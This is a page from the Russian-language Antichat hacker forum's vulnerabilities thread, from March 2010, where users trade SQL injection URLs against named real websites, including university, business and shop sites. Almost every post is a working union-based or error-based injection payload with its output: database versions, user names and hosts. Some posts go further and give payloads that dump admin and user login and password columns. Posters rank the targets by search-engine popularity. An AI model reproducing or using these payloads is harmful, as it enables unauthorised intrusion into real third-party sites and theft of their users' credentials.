ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11581  
Старый 13.03.2010, 23:53
Аватар для Paul_V
Paul_V
Новичок
Регистрация: 08.03.2010
Сообщений: 2
Провел на форуме:
2983

Репутация: 7
По умолчанию

http://dunfermline.info/diary/index?ID=1040&d=10&m=11&y=-2009'+union+select+concat_ws(0x3A,version(),user() ,database()), 2,3+--+

4.0.17-standard:sfl1_web159@localhost:sfl1_web159

Продюсерский центр «Пирамида»
в таблицах ничего нужного, но доступ есть.
http://pyramidfilm.ru/project.php?id=-44'+union+select+1,2,3,table_name,5,6,7+from+infor mation_schema.tables+where+table_schema=0x7A393130 31355F303031+limit+0,1--+

http://pyramidfilm.ru/project.php?id=-44'+union+select+1,2,3,concat_ws(0x3A,version(),us er(),database()),5,6,7+--+

5.0.32-Debian_7etch11-log:z91015_001@77.221.130.21:z91015_001

Последний раз редактировалось Paul_V; 14.03.2010 в 01:25..
 
Ответить с цитированием

  #11582  
Старый 14.03.2010, 19:03
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://demo.xbtit.com//index.php?page=users&order=flag+or(1,1)=(select+co unt(0),concat((select+database()+from+btit_users+l imit+0,1),floor(rand(0)*2))from(information_schema .tables)group+by+2)--++&by=ASC
=\
 
Ответить с цитированием

  #11583  
Старый 15.03.2010, 16:09
Аватар для sparcode
sparcode
Новичок
Регистрация: 03.07.2008
Сообщений: 3
Провел на форуме:
36610

Репутация: 1
По умолчанию

http://novitex.com.ua
Код:
http://novitex.com.ua/index.php?brandID=136%20union%20select%20@@version--
 
Ответить с цитированием

  #11584  
Старый 15.03.2010, 16:32
Аватар для G1G
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313

Репутация: 23
Talking

Офф сайт группы Би-2

Код:
http://www.bdva.ru/arhiv.phtml?id=146+and+1=0+union+select+1,2,3,4,5,6,7,version(),9,10,11--
PR 4 Тиц 900

----------------------------------
PR 5
Код:
http://ebusiness.byu.edu/book_review.php?ID=19+and+1=0+union+select+1,2,3,version%28%29,5,6,7,8,9,10--

Последний раз редактировалось G1G; 15.03.2010 в 16:35..
 
Ответить с цитированием

  #11585  
Старый 15.03.2010, 22:17
Аватар для Dr..VATSON
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591

Репутация: 43
По умолчанию

http://ebusiness.byu.edu/book_review.php?ID=-19+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+76,1%20--
 
Ответить с цитированием

  #11586  
Старый 15.03.2010, 23:30
Аватар для v1d0qz
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию

На основном домене

http://www.stanford.edu/group/spatialhistory/cgi-bin/site/pub.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36--+

pr 9, тиц 4100

Последний раз редактировалось v1d0qz; 15.03.2010 в 23:33..
 
Ответить с цитированием

  #11587  
Старый 16.03.2010, 01:43
Аватар для Seravin
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Код:
http://www.yickyak.com/news.php?catid=9%27+and+(select+1+from+(select+count(0),concat((select+version()+from+debates+limit+1),floor(rand(0)*2))+from+debates+group+by+2+limit+1)a)+and+%27123%27=%27123
version: 4.1.22-max-log1
user: yydbmain@72.167.131.1571
database: yydbmain1
 
Ответить с цитированием

  #11588  
Старый 16.03.2010, 02:38
Аватар для Red_EYEs
Red_EYEs
Познающий
Регистрация: 07.08.2009
Сообщений: 36
Провел на форуме:
257153

Репутация: 34
По умолчанию

Цитата:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/pub.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36--+
круто но вот там доступны только таблицы касающиеся раздела. Ничего интересного в них нет.

http://www.waterpump.com.ua/news.php?news_id=-61%20union%20select%201,2,3,VERSION(),USER(),6%20--
 
Ответить с цитированием

  #11589  
Старый 16.03.2010, 02:38
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.met-con.com/index.php

Код:
http://www.met-con.com/about/showEmp.php?id=1-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables--
5.0.89-community


PS: Вроде ниче интересного

______

http://www.tshome.com.tw/news-con.php?id=1-1%20union%20select%201,version(),3,4,5,6%20--

5.0.45-log

Китайцы сцук

____________

http://ocenshik.mostpp.ru/news.php?id=1-1%20union%20select%201,2,3,4,version(),6,7,8%20--

4.0.27
ТОП какой дебильный

______

http://www.belt-wrestling.org/en/news.php?id=1-1%20union%20select%201,2,3,4,5,6,7,version(),9%20--

4.1.22-standard

Сайт - ресслеров.. Надеюсь не побьют..
Таблиц не могу найти
________________
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,version(),6,7,8,9%2 0--
5.0.67-log

ОО кое чето поинтереснее =)
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,group_concat(column _name),6,7,8,9%20from%20information_schema.columns %20where%20table_name=0x61646d696e--
Отсюда узнаем колоночки (username,password) Хотя я и не сомневался =)

и Ну вобщем пароль нельзя выкладывать так что кому надо откопает сам
Код:
http://electromash.net/news.php?id=1&page=141-141%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9%20from%20admin--
_________________

http://www.sexshop24.ee/tm.php?id=1-1%20union%20select%20concat_ws(0x3a,ID,login,passw d)%20from%20ip_users%20--
5.0.67-log

Последний раз редактировалось Assembler; 16.03.2010 в 07:33..
 
Ответить с цитированием

  #11590  
Старый 17.03.2010, 01:27
Аватар для Dr..VATSON
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591

Репутация: 43
По умолчанию

Код HTML:
http://www.bilyardia.ru/zeus.catalog.phtml?idTowar=-41+union+select+1,2,user%28%29,4,version%28%29,6,7,8,9,10%20--
ТИЦ = 190

4.0.27-max-log
zeusspb9_shop@v12.valuehost.ru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ